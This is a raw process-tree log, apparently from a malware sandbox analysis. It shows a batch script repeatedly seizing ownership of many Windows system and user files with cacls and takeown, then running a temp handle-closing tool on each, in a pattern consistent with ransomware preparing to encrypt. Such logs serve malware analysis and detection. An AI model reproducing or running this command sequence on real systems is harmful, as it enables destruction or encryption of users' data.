-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:5312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:5360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:5416
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:5464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:5512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵
- Modifies file permissions
PID:5532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:5616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:5684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:5720
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:5768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:5816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵
- Modifies file permissions
PID:5836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:5872
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:5920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:5968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵
- Modifies file permissions
PID:5988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:6024
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:6072
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:6120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "watermark.png" -nobanner3⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "watermark.png" -nobanner4⤵PID:5148
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:5168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:5276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
PID:5252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "osver.txt" -nobanner3⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "osver.txt" -nobanner4⤵PID:5192
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:5388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:5356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:5580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:5508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
PID:5484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:5692
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:5752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:5636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:5828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "background.png" -nobanner3⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "background.png" -nobanner4⤵PID:5884
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:5808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵
- Modifies file permissions
PID:6000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:4388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵
- Modifies file permissions
PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:6116
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:5260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:5164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:5364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "wabmig.exe" -nobanner3⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "wabmig.exe" -nobanner4⤵PID:5240
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:5560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "background.png" -nobanner3⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "background.png" -nobanner4⤵PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:5728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:5556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "settings.dat" -nobanner3⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "settings.dat" -nobanner4⤵PID:6052
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:3056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:6100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "settings.dat" -nobanner3⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "settings.dat" -nobanner4⤵PID:5284
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:5244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5184
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""2⤵PID:5420
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C3⤵PID:5696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"3⤵PID:5324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "parse.dat" -nobanner3⤵PID:5524
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "parse.dat" -nobanner4⤵PID:5680
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""2⤵PID:5888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C3⤵PID:5600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"3⤵
- Modifies file permissions
PID:5492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SmsInterceptStore.jfm" -nobanner3⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SmsInterceptStore.jfm" -nobanner4⤵PID:6044
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:5780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
PID:4852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""2⤵PID:5140
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C3⤵PID:5344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"3⤵
- Modifies file permissions
PID:5308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "utc.app.json" -nobanner3⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "utc.app.json" -nobanner4⤵PID:5480
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:5632
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:6068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:5876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "device.png" -nobanner3⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "device.png" -nobanner4⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""2⤵PID:5128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C3⤵PID:5900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"3⤵
- Modifies file permissions
PID:5656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "utc.cert.json" -nobanner3⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "utc.cert.json" -nobanner4⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:5180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:5236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
- Modifies file permissions
PID:5572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:5604
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:5668
-
